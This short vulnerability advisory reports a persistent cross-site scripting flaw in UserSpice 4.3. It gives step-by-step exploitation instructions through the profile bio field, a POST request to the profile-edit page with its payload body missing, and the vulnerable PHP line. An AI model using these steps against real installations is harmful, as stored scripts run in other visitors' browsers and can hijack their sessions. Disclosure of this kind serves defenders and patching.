userSpice 4.3 Cross Site Scripting

userSpice version 4.3 suffers from a cross site scripting vulnerability.

MD5 | d5da674ca1fb9724ff316f704c021b3a

Application UserSpice PHP user management
Vulnerability userSpice <= 4.3 Persistent Cross Site Scripting
Date 2.13.2018
Author Dolev Farhi

1. Login with a regular user
2. Navigate to Public profile
3. Edit your bio
4. Enter XSS payload
5. Once anyone visits the Bio page the payload will execute

POST /users/edit_profile.php HTTP/1.1
Content-Length: 59
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,he;q=0.8
Connection: close


Vulnerable code:
<h4><a href="profile.php?id=<?=$v1->id?>" class="nounderline"><?=echouser($v1->id)?> </a></h4>

Related Posts